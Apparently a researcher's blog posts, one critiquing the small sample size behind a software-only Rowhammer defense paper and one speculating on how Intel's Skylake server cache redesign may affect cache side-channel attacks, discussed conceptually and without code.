That all said, I do not worry about the conclusion of this paper. The sample size is sufficient for the results to hold up and the paper is generally well written. I think this paper is a significant contribution to our knowledge on defending against cache side channel attacks.

 

Case study 2: CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks

Caveat, Apology and More Information

Before I start with my analysis of the statistics in this paper, I should mention that I had given my off-the-cuff comments on this paper before and I generally stand by what I wrote on that occasion. You will find my comments published in Security Week[6]. I did get one thing wrong in my off-the-cuff remarks: I wrote Brasser et al [3] draws heavily on Pessl et al. [4]. Brasser et al. do not use the Dram-mapping function used by Pessl et al.[4], as I initially thought they did. Instead, they use an ad-hoc specified approximate mapping function. Also it is very important to mention that I am referring to an early version of the paper on archiv substance to my previous off-the-cuff remarks or what I write in this blog post. As my critique of the paper is relatively harsh, I emailed the authors ahead of posting the blog post. As of publishing the blog post, I have not yet received an answer.

Getting dirty with it

“CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks” by Brasser et al. [3] implements two mitigations for the rowhammer problem: B-Catt and G-Catt. G-Catt uses memory partitioning, so that the kernel is not co-located in the same banks as user mode memory which prevents code hammering the kernel space from user mode. I am not convinced that G-Catt cannot be circumvented but that is not the subject of this blog post. I will instead focus on B-Catt. Kim et al [5] suggested not using vulnerable memory addresses and B-Catt implements this idea in a boot loader, rather elegantly using int 15h, subfunction 0xe820 which provides the operating system a list of memory regions it should avoid using. If the computer is not using any vulnerable addresses, one cannot flip bits with row hammer and the system is safe. Obviously, not using some of the physical memory comes at a cost for the end user. Kim et al. [5]concluded that “However, the first/second approaches are ineffective when every row in the module is a victim row (Section 6.3)”. Contrary, Brasser et al.[3] concludes: “…we demonstrate that it is an efficient and practical solution that effectively prevents rowhammer attacks as a short-term solution”. So, the big question is who it gets right here. The key issue is how many pages contain bit flips. Kim et. Al[5] do not provide numbers on pages, but Brasser et al do. They evaluate 3 test systems to support their conclusion: “However, our evaluation (Section VI-A2) suggests that only a fraction of rows are vulnerable in practice.”

And this is where my gripe with the statistics in this paper is. Sometimes you can get away with a tiny sample size. That is when you have prior evidence that the sample variance is either irrelevant or negligible. Relevance of the variance here is given. The prior evidence of a small variance is not present. In fact, I will argue quite the contrary in later.

But first let me get rid of the terrible loose language of “practical and efficient”. My 15 year experience as a professional software developer tells me that software needs to work as advertised on at least 99% of the systems. That is in my opinion a conservative value. Further assume that 5% memory overhead is acceptable for B-Catt users. Notice here that I defined practical as a fraction of systems that must be running with an acceptable overhead. The alternative would have been defining practical as a maximal acceptable average overhead. I consider the fraction approach the most applicable approach in most real world scenarios – it certainly is easier to do back-of-envelope calculations with, which I will be doing for the remainder of this blog post.

Now we can put the sample size of 3 into perspective. Imagine that in reality 10% of systems have more pages with bit flips than are acceptable. With a sample  size of 3 that gives us a 73% (0,93) chance that our evaluation will be “suggesting” that we are indeed practical. Being wrong 73% of the time is not a suggestion of being right. We need more data than 3 observations to assume practicality. Obviously, you may argue that my 10% is pulled out of a hat – and it is indeed. It is a conservative number, but not unrealistic.

This leads us to the question of how much data do we need? The answer to that question depends on the variance in the data, something that we do not know. So, we can either make an a-priori guess based on domain knowledge or do a pilot sample to get an idea. My first semester statistics book [6] states: “We recommend taking at least 20 observations in a pilot sample”. Pp. 419. So, the author’s samples do not even qualify as a pilot sample.

So we are left with turning to domain knowledge. Kim et. al [5] in my opinion has the best available data. They sample 129 modules but do not mention the number of affected pages. They do however mention that 3 modules have more than 40% affected rows. On a two channel skylake system (to my knowledge the best case) we can have 4 rows per page and assume all bit flips occur so that the smallest number of pages are affected – then we end up with 3 modules with at least 10% overhead out of 129. Thus no lesss 2,3% of modules will have too much overhead, according to my definition, in Kim’s samples. This certainly constitutes a reason for skepticism on Brasser et al’s[3] claims.

Kim et al. [5] unfortunately do not calculate a mean or standard deviation – they do report their complete data, so that I could calculate it, but instead I will use a bit of brute force to get somewhere. We know that rowhammer is fairly bad because 6 of 129 samples have more than 1 million bit flips. Assuming that each cell is equally likely to flip that gives us a 14,8% probability that a given page is vulnerable for any of these 6 modules. This assumption has weak support in Kim et. al. [5] Consequently, at least 4.6% of the modules are not practical under my definition and my fairly conservative assumptions. With a finite base of modules (200) and under the assumption that modules are equally common in the wild and 129 observations, we can calculate a 95% confidence interval. This confidence interval tells us that between 2.44% – 6.76% of the assumed 200 modules in the population are vulnerable. Obviously, it is not realistic to assume only 200 modules in existence, but if there are more the confidence interval would be even larger. Thus, under these assumption we must dismiss that B-Catt is practical with 95% confidence. It looks like B-Catt is in trouble.

The assumptions above are of cause very restrictive and thus more research is required. What would this research look like? A pilot sample with at least 20 samples would be a good start. Alternatively, we could use my above assumptions to calculate a sample size. If we do this we end up with the number 80.

Obviously, everything here rides on my definition of practicality and efficiency. My gut feeling is that B-Catt won’t turn out to be practical if we had a reasonable sample. Nevertheless I would love to see data on the issue. While I think my assumptions are fair for a mainstream product, there might be special cases where B-Catt may shine. For a data center that can search for a ram product with few bit flips B-Catt may very well be a solution.

 

Literature

[1] Ioannidis, John PA. “Why most published research findings are false.” PLos med 2.8

(2005): e124.

[2] Zhou, Ziqiao, Michael K. Reiter, and Yinqian Zhang. “A software approach to

defeating side channels in last-level caches.” Proceedings of the 2016 ACM SIGSAC

Conference on Computer and Communications Security. ACM, 2016.

[3] Brasser, Ferdinand, et al. “CAn’t Touch This: Practical and Generic Software-only

Defenses Against Rowhammer Attacks.” arXiv preprint arXiv:1611.08396 (2016).

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM addressing for cross-cpu

attacks.” Proceedings of the 25th USENIX Security Symposium. 2016.

[5] Kim, Yoongu, et al. “Flipping bits in memory without accessing them: An

experimental study of DRAM disturbance errors.” ACM SIGARCH Computer

Architecture News. Vol. 42. No. 3. IEEE Press, 2014.

[6] Berry, Donald A., and Bernard William Lindgren. Statistics: Theory and methods.

Duxbury Resource Center,

[7] Kovacs, Eduard. “Researchers Propose Software Mitigations for Rowhammer

Attacks” http://www.securityweek.com/researchers-propose-software-mitigations-

rowhammer-attacks

New cache architecture on Intel I9 and Skylake server: An initial assessment

 

Intel has introduced the new I9 CPU which is seen as HEDT (High-End-DeskTop) product. The micro architecture is in many respects shared with the new Skylake server micro architecture.I f history is a guide technology introduced in this segment slowly trickles down to more budget friend desktops. From a Micro architecture point of view it seems that several things about these CPU’s will force changes on micro architectural attacks – especially in the memory subsystem. In this blog post I’ll do a short overview on some of relevant changes and the effects they’ll may have on micro architecture attacks. Since I don’t own or have access to an actual I9 processor or Skylake server processor this blog post is just conjecture.

 

Resume of the “old” cache hierachy

The major changes over earlier process from a micro architecture point of view is that the cache system has received a significant overhaul. Current Intel CPUs have a 3 level cache hierarchy – two very small L1 caches, one for data, one for instructions. The second level cache (L2 or Mid Latency Cache) is somewhat larger. L1 data, L1 code and L2  part of each core and private to the core. Finally, Intel CPU’s had a huge 3rd level cache (usually called L3 or  largest latency cache) shared between all cores. The 3rd level cache is subdivided into slices that are logically connected to a core. To effectively share this cache, Intel connected them on a ring bus called the Quick Path Interconnect. Further the 3rd level cache was an inclusive cache, which means that anything that is anything cached in L1 or L2 must also be cached in L3.

 

Changes

Some of the important changes that has been announced in the Intel Software Optimization Manuals [1]  are:

–    A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

–    A reduced over all cache size per core (compared to similar older models)

–    A very significant increase in the size of the L2 (factor of 4)

–    Doubled the bandwidth of L2, while only slightly increasing the latency

–    Slightly more than offset by a reduction of the shared L3.

–    Reorganized  L3 cache to be a non-inclusive cache

–    Replaces the QPI with a mesh-style bus.

Why does these changes make sense?

Increasing the size of L2 on the cost of L3 makes sense as the L2 is much faster than L3 for applications – one can only assume that making the L3 helps reduce die size and cost. Also the increase in size of the L2 caches reduces the marginal utility of the L3. Finally  as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in L3 is a problem Intel has battled before. With Haswell they introduced Cache Allocation Technology (CAT) to allow software to control cache usage of the L3 to deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring buffer design. There is a penalty for having memory served from another core’s slices. On a ring bus this penalty is proportional to how far the cores are a part on the ring. With more cores, this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes with a cost as the same data are loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of the (L2 +L1) to L3 sizes. Previous this ratio has been around 1:10 (depending on actual CPU), but multiplying the L2 size by 4 and making the L3 a tiny bit smaller the ratio is now about 1:1.5. Thus the making the L3 cache non-inclusive is very essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive meaning the content of L3 cannot be loaded in L1 and L2. I think Intel would have used the defined term exclusive if the cache really where exclusive. Thus,   it is probably fair to assume that non-inclusive means that data may or may not be cached in L1, L2 and L3 at the same time, but exactly how this is governed is important. Unfortunately there is no information available on this.

It’s worth noting that many of these changes has been tested and developed by Intel for the Knights landing micro architecture. Knights landing is a high throughput micro architecture, sold in relative small amounts. Thus it’s likely that many features developed for this CPU will end up being trickled down.  It’ll be interesting to see if Intel plans to trickle it down into laptop/small desktops or use different cache designs for different classes of CPUs.

 

Effects

Cache side channel attacks

This new cache layout is likely to have profound effect on cache side channel attacks. I think Flush+Reload will work even without the non-inclusive cache. The flush primitive is based on the CLFlush instruction which is part of the instruction set architecture (ISA). Intel has been very reluctant in the past to change the ISA and therefore my estimate is that flushing will work as always. I think the reload primitive will remain active – I find it likely that an uncached load will also load stuff into the shared L3. Also it’s likely that the QPI replacement bus can be used to fetch data from private L2 caches similar to AMD’s cross CPU transmission. This will give Flush+reload a nice flush+transfer flavor, but it’ll still work. For more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled in someway we can fairly certain that at least one of these things are true, if not both. The latter being my guess.

The big change are likely to be related to evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can can load stuff into another core’s private hierarchy. Thus, the prime and evict primitives for  cross core attacks.  However,both are likely to work decently within a core (Hyper threading or scheduling on same core).

While the ISA behavior of CLFLush is almost certain to remain unchanged, the micro architecture below it will see significant changes. With QPI gone using the flush+flush attack by Gruss et al. [3] to find out how many hubs on the ring bus away you are from a particular slice almost certainly won’t work. This does not mean that you won’t find a side channel here in CLFlush, buses are typically bandwidth limited thus being an obvious source of congestion – without an inclusive L3 the bus bandwidth might even be easier to consume. Also the Flush+Flush attack as a Flush+reload replacement, is likely to produce a different timing behavior in the new micro architecture. My guess upfront is that a timing difference and thus a side channel remains.

Also affected by the non-inclusiveness of the L3 is row buffer side channel attacks such as those presented by Pessl. et al.[4]  Without an effective eviction cross core attacks may be severely stifled. The ability to reverse engineer the DRAM complex mapping function is likely to remain unchanged as it hinges not on eviction, but the CLFlush instruction’s ISA behavior.

With the CLFlush instruction and evict likely still working on local cores, row hammer will  remain effective. But in some scenarios, indirect effects of  micro architecture changes may break specific attacks such as that of  Sarani Bhattacharya, Debdeep Mukhopadhyay [5]. The reason is that such attacks rely on information leakage in the caches, that becomes more difficult to leverage as described above.

 

Future

While the changes to the cache makes sense with the significant number of cores in the affected systems, it seems unlikely that the changes will trickle down to notebooks and laptops. With only two cores the existing cache design seems sensible. Thus we are likely to see a two tier cache design moving on.

Conclusion

Having a non-inclusive L3 cache is significantly more secure from a side channel perspective than an inclusive in cross core scenarios. This opens up for defending these attacks, by isolating different security domains on different cores potentially dynamically. While flush+reload is likely to be unaffected, this attack is also the easiest to thwart in real life scenarios as avoiding shared memory cross security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these micro architecture changes.

 

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.a

[3] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf